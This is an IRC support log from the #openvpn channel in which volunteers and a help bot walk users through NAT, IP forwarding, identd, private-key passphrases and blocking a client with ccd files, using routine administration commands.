22:17 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
22:18 < blackness> http://paste.blackmajic.org:81/index.php?show=29
22:21 <+pekster> And something basic like 'ping 4.2.2.1' fails after you connect blackness ?
22:22 < blackness> yes
22:22 < blackness> it just 'hangs'
22:23 < blackness> im not using any firewall period.
22:23 < blackness> and DNS works perfectly. dont matter if i use udp, tcp for openvpn.
22:23 <+pekster> Looks like there's something wrong on the server not handling the forwarding properly. Have you properly set up source-NAT?
22:23 <+pekster> !redirect
22:23 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
22:23 <@vpnHelper> http://ircpimps.org/redirect.png
22:24 < blackness> !def1
22:24 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
22:24 <+pekster> You need both IP forwarding enabled and NAT configured. If you want a double-check of your NAT setup, post the output of 'iptables-save' and verify that 'cat /proc/sys/net/ipv4/ip_forward' returns the value of '1'
22:24 < blackness> should i push that from the client or server ?
22:24 < blackness> im not using iptables.
22:25 <+pekster> The way you're pushing the redirect-gateway value is fine
22:25 < blackness> and /proc/sys/../ip_forward returns 1 on the server.
22:25 <+pekster> (the push you have on the client for explicit-exit-notify is however pointless)
22:25 < blackness> okay.
22:25 <+pekster> You need to use some form of NAT; if you're not using netfilter (ie: iptables) how are you performing NAT?
22:25 < blackness> i wasnt aware i needed iptables.
22:25 <+pekster> The bot's reply for "redirect" I posted above indicates NAT is required
22:25 < blackness> do i need an extensive iptables setup for that?
22:26 <+pekster> Nope
22:26 <+pekster> !linnat
22:26 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat
22:26 < blackness> thats all i need to do?
22:26 <+pekster> IP forwarding also needs to be enabled:
22:26 <+pekster> !ipforward
22:26 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward
22:26 <+pekster> !linipforward
22:26 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
22:27 < blackness> so i issue the first line, then the second line and thats it?
22:27 < blackness> i dont use iptables much :P
22:27 <+pekster> Right. Those only stay in memory until reboot, so you should use your distro's preferred way to make both changes persistent
22:27 < blackness> thats not an issue. :)
22:27 < blackness> i got a debian firewall-save i can modify
22:27 <+pekster> /etc/sysctl.conf is usually pretty supported across distros, but every distro does firewall save/restore differently
22:28 < blackness> but im going to test it temp in case im locked out :P
22:28 <+pekster> Yup
22:28 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn
22:28 <+pekster> A cronjob to reboot 10 minutes into the future never hurts either ;)
22:28 < blackness> its a VPS..xm reboot domain :P
22:29 <+pekster> It's more fun when you lock yourself out of a physical hardware system that's in a different state with no remote hands ;)
22:33 -!- black [~black@vdsl001.client.black.blackmajic.org] has joined #openvpn
22:33 < black> ok..i got it working.
22:33 -!- blackness [~black@mobile.blackmajic.org] has quit [Ping timeout: 252 seconds]
22:33 < black> now to fix the ident
22:33 -!- black is now known as Guest90493
22:33 -!- Guest90493 [~black@vdsl001.client.black.blackmajic.org] has left #openvpn []
22:33 -!- blackness [~black@vdsl001.client.black.blackmajic.org] has joined #openvpn
22:34 < blackness> sorry for the j/p..
22:34 < blackness> now to figure out how to open the ports..so identd will work and what not
22:34 <+pekster> You want to run an identd on the VPN server, or forward it to your connected client?
22:35 <+pekster> (the former is easier; the latter requires a DNAT rule and binding your IP to the target IP of that rule, or optionally doing that dynamically via a --client-connect ovpn script parameter)
22:35 < blackness> i got oidentd running on the VPN host.
22:35 < blackness> but it isnt working..
22:35 <+pekster> Now that part I can't help you with :P
22:35 < blackness> at least i dont think it is.
22:36 * pekster shines his "~" in front of his user
22:36 < blackness> yeah..its running but isnt working.
22:36 < blackness> i just tested it
22:36 <+pekster> I'll settle for using an X509-secured TLS connection to Freenode instead of having identd work :P
22:36 < blackness> i guess i gotta fwd all port traffic to my client?
22:37 <+pekster> You can run identd wherever you'd like; how you get it to reply with the expected value is something I have no experience with. I just send TCP reset packets on my ident port
22:37 <+pekster> (eg: IRC bouncers somehow tie the reply to the user the account is bound to)
22:38 <+pekster> I don't run a bouncer, so I only care about actively rejecting the ident query from the IRC server so I don't have to wait 10 seconds while it "tries" to get a reply on port 113
22:43 < blackness> i got oidentd running on vpn host, and vpn client and it fails..guess i gotta set the vpn dhcp ip
22:43 < blackness> root oidentd 3894 tcp4 10.8.0.6:113 *:* LISTEN :P
22:44 <+pekster> That looks like your client; a request from the server performing the connection (such as the IRC server) will reach your public IP on your VPN server, not that RFC1918 private address
22:46 < blackness> hm.
22:47 <+pekster> That's why you need SNAT to get out; your private 10.8.0/24 network doesn't actually exist as far as the rest of the Internet is concerned
22:48 < blackness> hm.
22:48 < blackness> idk if i got SNAT working currently
22:48 < blackness> i thought all the traffic was passed to the client?
22:49 <+pekster> The reply traffic is, thanks to conntrack
22:49 < blackness> what about request?
22:49 <+pekster> What request? When the client sends data to the VPN server for the outside web?
22:50 < blackness> when i send out a connection to IRC, when the IRC server requests information, how would it reach the client?
22:51 < blackness> like, the HostVPN is listening *:113, should it reply what is being forwarded by the client?
22:51 <+pekster> conntrack keeps track of stateful connections, so a reply to a translated session that the client has initiated is sent back to the client
22:51 < blackness> hmm..seems this is going to take a little more research :P
22:51 <+pekster> It doesn't work the other way around, because "the Internet" has no way to reach your "10.8.0.6" system. I could be using that on my private network as my home LAN
22:51 < blackness> or im going to have to write an iptables.sh as well.
22:52 < blackness> what if i direct incoming:113 to the IP of the local lan?
22:52 <+pekster> Right, that's called destination-NAT, or DNAT, and I noted that solution above
22:52 < blackness> ahh
22:52 < blackness> i gotta learn dnat before i can write all i need
23:03 < blackness> got it working :)
23:03 < blackness> thanks pekster
23:31 < blackness> well, i found a small bug..with my fw, i cant connect to my VPS. how do i open the ports to the host so i can SSH/VPN in?
23:50 -!- blackness [~black@vdsl001.client.black.blackmajic.org] has quit [Ping timeout: 252 seconds]
--- Day changed Sat Jan 12 2013
00:07 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn
00:12 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Quit: Leaving]
00:15 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn
00:21 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 264 seconds]
00:26 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection]
01:07 -!- spricer [~mix@192-0-132-186.cpe.teksavvy.com] has joined #openvpn
01:08 < spricer> Hi, is there a way to pass certificate password to configuration file?
01:09 <+pekster> spricer: See the --askpass option in the manpage. If you're going to use that, you're really better off just decrypting the private key in the first place
01:12 < spricer> You are right I can create new certificate but just still curious in dark side :) txs
01:12 <+pekster> You don't need to create a new "Certificate" at all
01:12 <+pekster> You can decrypt the private key anytime you want
01:12 <+pekster> Or re-encrypt it with a different passphrase
01:12 <+pekster> Also on point: you don't encrypt the certificate; that's public knowledge. You encrypt the private key
01:13 < spricer> that is also true...
01:13 <+pekster> 'openssl rsa -' will output usage on managing an existing RSA key
01:14 <+pekster> eg: to decrypt one, use 'openssl rsa -in current.key -out new.key' or to set a passphrase or change it to a new one, use 'openssl rsa -in current.key -out new.key -des3'
01:44 -!- spricer [~mix@192-0-132-186.cpe.teksavvy.com] has quit [Quit: Leaving]
02:15 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn
02:30 -!- havoc [~havoc@neptune.chaillet.net] has quit [Ping timeout: 244 seconds]
02:40 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
03:02 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
03:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
04:15 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 260 seconds]
04:15 -!- black_ [black@vdsl001.client.black.blackmajic.org] has joined #openvpn
04:15 -!- black_ is now known as blackness
04:20 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds]
04:22 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Ping timeout: 248 seconds]
04:24 -!- blackness [black@vdsl001.client.black.blackmajic.org] has quit [Ping timeout: 244 seconds]
04:26 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn
04:27 -!- havoc [~havoc@neptune.chaillet.net] has joined #openvpn
04:27 -!- blackness
[black@vdsl001.client.black.blackmajic.org] has joined #openvpn 04:42 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 04:43 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 04:46 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has joined #openvpn 04:50 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 05:07 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 05:13 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 05:29 -!- Mhrok [~mhrok@178-36-52-42.adsl.inetia.pl] has joined #openvpn 05:29 < Mhrok> Hello! 05:43 -!- Mhrok [~mhrok@178-36-52-42.adsl.inetia.pl] has quit [Quit: WeeChat 0.4.0-rc1] 06:27 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 06:34 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 06:43 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:59 -!- p3rror [~mezgani@2001:0:53aa:64c:74:6e1a:d607:4b7d] has joined #openvpn 07:04 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Excess Flood] 07:05 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 07:11 -!- p3rror [~mezgani@2001:0:53aa:64c:74:6e1a:d607:4b7d] has quit [Remote host closed the connection] 07:19 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 07:21 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 07:23 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn 07:25 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 07:30 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 07:42 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 07:47 -!- cosmicgate [~root@216.17.109.26] has quit [Remote host closed the connection] 07:48 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 07:50 -!- cosmicgate 
[~root@216.17.109.26] has joined #openvpn 07:50 -!- cosmicgate is now known as asdasdasd 07:56 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 08:03 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 08:06 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-uxbspexqfkwdnydz] has quit [Quit: Planned maintenance, back soon] 08:06 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wznbqzxmeppumdbt] has quit [Quit: Planned maintenance, back soon] 08:34 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 08:40 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 08:43 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 08:45 -!- asdasdasd [~root@216.17.109.26] has quit [Ping timeout: 240 seconds] 08:51 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 08:56 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 08:58 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-jwtrifiamymywmib] has joined #openvpn 08:59 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn 09:02 -!- u0m3 [~Radu@92.80.72.203] has quit [Client Quit] 09:03 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-layqgdbowlknfrko] has joined #openvpn 09:04 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn 09:11 -!- blackness [black@vdsl001.client.black.blackmajic.org] has quit [Quit: Leaving] 09:19 -!- u0m3 [~Radu@92.80.72.203] has quit [Read error: Connection reset by peer] 09:22 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn 09:59 -!- s7r [~s7r@openvpn/user/s7r] has quit [Ping timeout: 265 seconds] 10:13 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 10:14 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has left #openvpn [] 10:20 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 10:21 -!- master_of_master [~master_of@p57B54DDA.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 10:23 -!- master_of_master 
[~master_of@p57B5338D.dip.t-dialin.net] has joined #openvpn 10:26 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds] 10:26 -!- Assid [~kvirc@unaffiliated/assid] has joined #openvpn 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:38 -!- Assid [~kvirc@unaffiliated/assid] has quit [Quit: KVIrc 4.2.0 Equilibrium http://www.kvirc.net/] 10:59 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 11:04 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 11:04 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 11:06 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 11:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 255 seconds] 11:22 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 11:29 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 11:36 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 11:42 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 11:47 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 11:54 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 12:05 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 12:11 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 12:14 -!- [1]JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- \o/] 12:15 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 12:15 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 12:18 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 12:21 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 12:48 -!- brute11k1 [~brute11k@89.249.235.33] has joined #openvpn 12:49 -!- brute11k 
[~brute11k@89.249.235.33] has quit [Ping timeout: 244 seconds] 12:59 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 13:02 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 13:06 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 13:12 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 13:19 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 13:28 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 13:36 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 13:42 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 13:49 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 13:50 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 13:54 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Client Quit] 13:54 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 14:00 -!- ngharo [~ngharo@2001:1af8:4400:a049::] has quit [Ping timeout: 264 seconds] 14:02 -!- brute11k [~brute11k@89.249.230.77] has joined #openvpn 14:04 -!- brute11k1 [~brute11k@89.249.235.33] has quit [Ping timeout: 252 seconds] 14:06 -!- ngharo [~ngharo@2001:1af8:4400:a049::] has joined #openvpn 14:09 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 14:22 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 14:33 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 14:35 -!- Porkepix_ [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 14:36 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 14:41 -!- brute11k [~brute11k@89.249.230.77] has quit [Quit: Leaving.] 
14:52 -!- Porkepix_ is now known as Porkepix 14:57 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Ping timeout: 272 seconds] 15:00 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 15:02 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 260 seconds] 15:06 -!- gladiatr [~usualfrog@openvpn/community/support/gladiatr] has joined #openvpn 15:11 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 15:14 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 15:16 -!- Porkepix [~Porkepix@lns-bzn-33-82-252-12-99.adsl.proxad.net] has joined #openvpn 15:35 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 15:38 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 15:58 -!- gladiatr [~usualfrog@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 16:06 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 246 seconds] 16:07 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 16:14 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Read error: Connection reset by peer] 16:15 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 16:17 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Read error: Connection reset by peer] 16:18 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 16:18 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Client Quit] 16:50 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 252 seconds] 16:54 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 17:15 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Disconnected by services] 17:17 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 17:17 -!- mode/#openvpn [+o vpnHelper] by ChanServ 17:23 -!- 
swat [~swat@ubuntu/member/swat] has joined #openvpn
17:46 -!- CrashTM [~CrashTM@98.144.34.109] has joined #openvpn
17:54 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection]
18:18 -!- CrashTM [~CrashTM@98.144.34.109] has quit [Ping timeout: 272 seconds]
18:31 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn
18:39 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Read error: Connection reset by peer]
18:43 -!- Z_Analyzer [~lipalm@173-164-219-57-SFBA.hfc.comcastbusiness.net] has joined #openvpn
18:44 < Z_Analyzer> hello - is there a way to 'suspend', not revoke, a user account (CERT) on the server side ?
19:02 < BtbN> revoke the cert, and later un-revoke it?
19:05 < dioz> lets not split hairs
19:05 < MagisterQuis> Z_Analyzer: If you want to ban for a certain amount of time, use an at job.
19:07 < Z_Analyzer> I'm trying to use a ccd file - that doesn't seem to work ) no idea i could revoke and un-revoke later without sending new keys
19:07 < Z_Analyzer> MagisterQuis, what would you put in the job ?
19:07 < MagisterQuis> Z_Analyzer: The command to unrevoke a cert.
19:08 < MagisterQuis> I have to look it up every time.
19:08 < MagisterQuis> http://blog.abhijeetr.com/2012/06/revokeunrevoke-client-certificate-in.html
19:08 <@vpnHelper> Title: Blog by Abhijeet Rastogi about Linux: Revoke/Unrevoke a client certificate in OpenVPN (at blog.abhijeetr.com)
19:10 < MagisterQuis> Even better http://robert.penz.name/21/ovpncncheck-an-openvpn-tls-verify-script/
19:10 < Z_Analyzer> yeah i'm checking out the tols-verify thing
19:10 < Z_Analyzer> tls*
19:10 <@vpnHelper> Title: ovpnCNcheck an OpenVPN tls-verify script | Robert Penz Blog (at robert.penz.name)
19:10 < Z_Analyzer> tnx
19:10 < MagisterQuis> Google.
19:10 < MagisterQuis> http://google.com
19:10 <@vpnHelper> Title: Google (at google.com)
19:10 < MagisterQuis> Heh.
19:11 < Z_Analyzer> yeah i saw the revoke part, most FAQs and blogs talk about revoking being final - i was missing the unrevoke link
19:13 <+pekster> Z_Analyzer: Put the 'disable' directive in a ccd file
19:13 < Z_Analyzer> pekster, i tried, that didn't work
19:16 <+pekster> Hmm, I thought that was valid (trying to confirm now.) You could also use a --client-connect script that simply tests for the $common_name you're interested in and reject it by exiting non-zero status
19:17 <+pekster> if [ "$common_name" = "invalid X509 CN from your cert" ]; then exit 1; fi; exit 0
19:17 <+pekster> Or such
19:17 < MagisterQuis> Neat idea.
19:17 < MagisterQuis> Benefit of that is you could use a database for scalability and to prevent someone trying to read and write a text file simultaneously.
19:21 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
19:24 -!- Crosshair84 [~Crosshair@200.49.30.11] has joined #openvpn
19:24 < Crosshair84> hello
19:25 < Crosshair84> I need help I want to make a site to site vpn but I have some problems
19:25 < Crosshair84> I don't know what to do
19:26 < Crosshair84> can you help me?
19:26 <+pekster> Crosshair84: Do you have basic connectivity right now? Until you do you can't proceed further
19:26 < Crosshair84> yes
19:26 < Crosshair84> the client is connected
19:26 < Crosshair84> but
19:26 < Crosshair84> the problem is
19:26 < Crosshair84> from the server lan side I can't reach the client
19:26 < Crosshair84> and vice versa
19:27 <+pekster> You have LANs behind both the server and client?
19:27 <+pekster> Or just one?
19:27 < Crosshair84> yes from both
19:28 <+pekster> You should pick one at a time to get working. We have some handy guides and a flowchart that describes all the steps you need:
19:28 <+pekster> For the LAN behind the server, see this:
19:28 <+pekster> !serverlan
19:28 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
19:28 <+pekster> For the LAN behind the client:
19:28 <+pekster> !clientlan
19:28 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
19:28 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
19:31 < Crosshair84> ok
19:32 < Crosshair84> !ipfoward
19:33 <+pekster> !ipforward
19:33 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward
19:33 <+pekster> (you missed the 'r')
19:34 < Crosshair84> !winipforward
19:34 <@vpnHelper> "winipforward" is http://support.microsoft.com/kb/315236 to enable ip forwarding on windows
19:36 < Crosshair84> I just changed it in my windows client
19:37 < Crosshair84> I didn't know about the forward in the server and client, I just followed the HOW TO of the openvpn site
19:37 < Crosshair84> !linipforward
19:37 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
19:56 < Crosshair84> pekster, THANK YOU
19:57 < Crosshair84> I think that maybe the problem is the ipforwarding in both client and server
19:57 < Crosshair84> I made the changes in both and I can reach the 2 networks fine
19:58 < Crosshair84> It will be good if you add this information in the HOWTO of the official page
20:05 < Z_Analyzer> pekster: i ended up implementing your suggestion - works great
20:05 < Z_Analyzer> tnx
20:23 <+pekster> Z_Analyzer: np. I was busy earlier, but I just tested the 'disable' directive in a ccd file and it works as expected by rejecting the client
20:24 < Z_Analyzer> pekster, no luck for me with that one
20:24 <+pekster> I get this in my server-side log when attempting to connect with a CN of "client": "MULTI: client has been rejected due to 'disable' directive"
20:25 <+pekster> At least under 2.3.0 (I'm not sure when that option was added; you can check your manpage for the "--disable" parameter, which only ever makes sense for a ccd file)
20:25 < Z_Analyzer> pekster, i have 2.1.3
20:25 <+pekster> Ah, that may be too old to support that
20:26 < Z_Analyzer> Disable a particular client (based on the common name) from connecting. Don't use this option to disable a client
20:26 < Z_Analyzer> due to key or password compromise. Use a CRL (certificate revocation list) instead (see the --crl-verify option).
20:26 < Z_Analyzer> all i got about it
20:27 <+pekster> Are you *sure* your ccd file is named properly (no .txt or any suffix to the file) and that it's the correct case on case-sensitive OS?
20:27 <+pekster> verb 5 on the server should at least confirm it finds the ccd file when the client connects
20:27 < Z_Analyzer> i gave the file an extension
20:27 < Z_Analyzer> hm
20:27 <+pekster> You can't do that
20:27 <+pekster> Unless you actually signed your cert like "MyClient.txt"
20:28 <+pekster> ie: CN=SampleName.txt
20:28 <+pekster> Most people don't do that ;)
20:29 < Z_Analyzer> hmmm that must be it
20:29 < Z_Analyzer> a bit obscure
20:29 <+pekster> Not at all
20:29 <+pekster> Manpage says "OpenVPN will look in this directory for a file having the same name as the client's X509 common name. If a matching file exists, it will be opened and parsed for client-specific configuration options."
20:30 <+pekster> So, if a file does not exist named the same (yes, that's EXACTLY the same) as the client's X509 common name, it will not be parsed
20:30 < Crosshair84> PEKSTER thanks for your help
20:30 <+pekster> Crosshair84: np
20:30 < Crosshair84> good night bye
20:31 -!- Crosshair84 [~Crosshair@200.49.30.11] has quit []
20:46 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.]
20:50 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 21:10 -!- thermoman [~thermoman@idle.foobar0815.de] has joined #openvpn 22:04 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 22:05 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 23:28 -!- blackness [black@vdsl001.client.black.blackmajic.org] has joined #openvpn --- Day changed Sun Jan 13 2013 00:14 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 264 seconds] 00:22 -!- spricer [mix@anon-163-109.vpn.ipredator.se] has joined #openvpn 00:29 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 00:29 -!- tjz [~tjz@unaffiliated/tjz] has quit [Client Quit] 00:31 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 01:00 -!- mix_ [~mix@192-0-132-186.cpe.teksavvy.com] has joined #openvpn 01:02 -!- spricer [mix@anon-163-109.vpn.ipredator.se] has quit [Ping timeout: 252 seconds] 01:26 -!- anth0ny [~anth0ny@unaffiliated/anth0ny] has joined #openvpn 01:28 < anth0ny> trying to set up a vpn 